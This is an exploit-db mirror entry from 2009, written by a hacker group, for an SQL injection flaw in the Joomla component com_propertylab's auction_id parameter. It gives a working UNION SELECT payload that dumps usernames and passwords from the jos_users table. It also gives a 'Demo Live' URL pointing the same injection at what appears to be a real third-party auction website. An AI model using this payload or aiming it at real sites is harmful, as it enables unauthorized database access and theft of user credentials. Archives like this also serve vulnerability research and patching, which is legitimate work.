exploit-db-mirror/exploits/php/webapps/9112.txt

--------------------------------------------------------------------------
Joomla Component com_propertylab (auction_id) SQL injection Vulnerability
--------------------------------------------------------------------------

 ###################################################
 [+] Author        :  Chip D3 Bi0s
 [+] Email         :  chipdebios[alt+64]gmail.com
 [+] Group         :  LatinHackTeam
 [+] Vulnerability :  SQL injection
 ###################################################


Example:

http://localHost/path/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26<Sql Code>

<Sql Code>:
+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users


Demo Live (1):

http://www.grahampennyauctions.com/index.php?option=com_propertylab&task=propertysearch&type=forsale&minprice=1&start=0&perpage=20&auction_id=26+and+1=2+union+select+1,2,3,4,5,6,concat(username,0x3a,password)+from+jos_users


Thanks for all Str0ke
and you are unbeatable :)

+++++++++++++++++++++++++++++++++
[!] Produced in South America
---------------------------------

# milw0rm.com [2009-07-10]